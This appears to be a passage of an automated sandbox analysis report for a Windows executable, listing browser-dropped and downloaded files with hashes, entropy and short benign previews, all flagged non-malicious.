                                                                                                                                                                                                                                                                                    SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):122218
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                                    MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                                    SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                                    SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                                    SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):291
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                    MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                    SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                    SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                    SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):130866
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                                    MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                                    SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                                    SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                                    SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1753
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                    MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                    SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                    SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                    SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "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",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):9815
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                    MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                    SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                    SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                    SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):10388
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                    MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                    SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                    SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                    SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):962
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                    MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                    SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                    SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                    SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):11185
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                    MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                    SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                    SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                    SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 27 12:46:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2677
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.9736970844231383
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:8oduTKe0HAidAKZdA19ehwiZUklqeh2y+3:85b7Zy
                                                                                                                                                                                                                                                                                    MD5:3C2F5C2FD851F5E7166F1277266C8D46
                                                                                                                                                                                                                                                                                    SHA1:91E4C16BA9D2E4B63E2450C27D74D0108421564A
                                                                                                                                                                                                                                                                                    SHA-256:1F32A5F84E49D42D019A0F47031F20A7EC3A8D81D9FECF96199C1EC2C88D3105
                                                                                                                                                                                                                                                                                    SHA-512:19A7B644B26DA3A9EE7B50624554CBE9CFFBE89C85734E98920A54B8E1906D7ACF2F3EDEDEEBF9813EFCDC781BCE13266D550EF2E1CEF8A049C3EEC96E69B123
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 27 12:46:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2679
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.985887108657228
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:87duTKe0HAidAKZdA1weh/iZUkAQkqehJy+2:8wbJ9Q0y
                                                                                                                                                                                                                                                                                    MD5:D095B497AE360288DFAEEF676B57CB43
                                                                                                                                                                                                                                                                                    SHA1:631C2B5EBAB38A9A54760CBD6FE569C0FFB04DE3
                                                                                                                                                                                                                                                                                    SHA-256:355B9ACC85C1290FA92669FF75FEADB060865CE7C56A9CE5D531CEA107F4F3BB
                                                                                                                                                                                                                                                                                    SHA-512:2AE2AC2B8468FD45DAF589230312D7406E4168296EE5BD6C65EF5AA73C096917345C67243F12ABD862091741F49B207982307069C06141838729F7527120B7D5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2693
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.003362996129074
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:8xnduTKesHAidAKZdA14tseh7sFiZUkmgqeh7sny+BX:8xcbxnVy
                                                                                                                                                                                                                                                                                    MD5:06F6D5ED6EA3FA94924569BA08EE1494
                                                                                                                                                                                                                                                                                    SHA1:12C611413FE33B9B851EA85D2771DFD2613B286D
                                                                                                                                                                                                                                                                                    SHA-256:B75566C037398EB26AF9125E75E35F24B4DE9168FD252C9274207C244192947F
                                                                                                                                                                                                                                                                                    SHA-512:BDFDAECA12A78300829CFEB84C7DC165397D1F4F699D3EE248C573E2EDB14435C3BEB724C5640A2E7D75B03C74E58BAC651DE0754A40EF71ECF8A4B641BB5D0C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 27 12:46:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2681
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.9889761957191534
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:8oduTKe0HAidAKZdA1vehDiZUkwqeh9y+R:85bKvy
                                                                                                                                                                                                                                                                                    MD5:ABE68B5A856734BD9B3ED7E24AC8A32E
                                                                                                                                                                                                                                                                                    SHA1:4E6D9132BCE72C45AFC2A2221E969BEB133B6C23
                                                                                                                                                                                                                                                                                    SHA-256:DB286113E70F2E06E5000B51DEFEDF120212412C4F59F259F8E2B4A9EEC03AEA
                                                                                                                                                                                                                                                                                    SHA-512:9E4D40B4011E524C0818A3F79E9CC1E130D0789B1901ADEE20EA4E0C6AE004D1EDDC944AA2BD0E892860902A21FD91EE9DF34735B2BAEF2CE7A2B90DA1CEA03E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 27 12:46:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2681
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.9788269121564137
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:8ZduTKe0HAidAKZdA1hehBiZUk1W1qehjy+C:8abq9Dy
                                                                                                                                                                                                                                                                                    MD5:1880DE6E0C02C00DAFB9860FC378456F
                                                                                                                                                                                                                                                                                    SHA1:03501073BB46B627A077B1B846947A1F9D0D2535
                                                                                                                                                                                                                                                                                    SHA-256:EF1A8A6F0A72648E90A1438736578E7CA67E6EEE39FD0A85F6CDB37918EE5FF9
                                                                                                                                                                                                                                                                                    SHA-512:59247320C0D592D9CE6405C38AAD297894BD85D2437BA3E4048E9EE63176267D31E223B078397AA1D80577428D02D2974BA1EFD0D3B8F7E6587B5359467A85B8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 27 12:46:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2683
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.9857034366484214
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:8aduTKe0HAidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbVy+yT+:8Pb0T/TbxWOvTbVy7T
                                                                                                                                                                                                                                                                                    MD5:76DD55EF589C8A69A60EB598BB8C44B7
                                                                                                                                                                                                                                                                                    SHA1:B6DE29C0A9B9D86743D4F5198D3FAA116870D3BE
                                                                                                                                                                                                                                                                                    SHA-256:29A972726CC700999F91151BCBAC89F74ABAED522E91A0CCBDF19603A9BEFCD7
                                                                                                                                                                                                                                                                                    SHA-512:685363778C31DE56DE689E5661ADE5395173C87B77881651A9DBEB7D20E5171A7A8AC4E5364F5E8A1935B836933AD6405B4423F7065B7994B1E913372B4E0ADC
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3663)
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):3668
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.843832784313439
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:bUTolifFd66666HxVMmIKOTdvNHVNuaIZfwKNKnSwWfQfffo:giQFd666667FOTRNHVAaIVNMn6
                                                                                                                                                                                                                                                                                    MD5:CD0CE2760DD45A135CB5ED57D78D8D4B
                                                                                                                                                                                                                                                                                    SHA1:AF67651D40861DAB2273D614AD73F22E2918EEF6
                                                                                                                                                                                                                                                                                    SHA-256:18FAF44E93505FDEC5D78A8904A20404981718593BB284101CFAC9039694D30F
                                                                                                                                                                                                                                                                                    SHA-512:491869197BA6958A1971748ACDEEA0CC8925D080D9087F83C074C1090C39EB0C51CD1FD09481095EB7B489907AD8BB337393FAE39BA3E15AD53F4B6FF48998C6
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:)]}'.["",["nintendo switch console","okc thunder vs indiana pacers prediction","kevin mccallister","dolphin stampede southern california","northeast ohio air quality alert","nasa astronauts stuck in space","walker buehler red sox","gingerbread gala monopoly go rewards"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"google:entityinfo":"
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):29
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                                    MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                                    SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                                    SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                                    SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                                    Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):132739
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.4369848931472955
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3072:fQkJQ7O4N5dTm+syHEt4W3XdQ4Q6JuSr/nUW2i6o:f1Q7HTt/sHdQ4Q6JDfUW8o
                                                                                                                                                                                                                                                                                    MD5:FFCE4F102FA784D21F60A85DB90675A5
                                                                                                                                                                                                                                                                                    SHA1:ECE92FAD9F0F051830B61D11ECE8527DD70E0651
                                                                                                                                                                                                                                                                                    SHA-256:B547361679B06F23114A1EE22B046B772333EF6CDF825726BF492F1960E43871
                                                                                                                                                                                                                                                                                    SHA-512:08D1E7E365BAB119CD6E54C243B73415C6751204AADA6BEBFDE37FE7BB7FEA42291D190F0839D3315AD9F370CF1A767A432E154D7A529C0E730DB9DFF43670A6
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):5162
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.3503139230837595
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                                                                                                                                                                    MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                                                                                                                                    SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                                                                                                                                    SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                                                                                                                                                                    SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
                                                                                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.968633951628565
                                                                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                    File name:JA7cOAGHym.exe
                                                                                                                                                                                                                                                                                    File size:1'199'374 bytes
                                                                                                                                                                                                                                                                                    MD5:6e90f0e42285206dce01ffbbd748b081
                                                                                                                                                                                                                                                                                    SHA1:553136becab0e4000f4a47b68d732c2e921cbdc9
                                                                                                                                                                                                                                                                                    SHA256:9b2f6d11a8ffb4d7124fe6ce8ace1672070ee668759900130100d81bc5378dc2
                                                                                                                                                                                                                                                                                    SHA512:61e2596319cc7578b534be41b6223cb5b430a0d1fbd83c490844b45a14bc5105a0c85307da92028eacd1812a89547c503693702228745981d271a4560d40e115
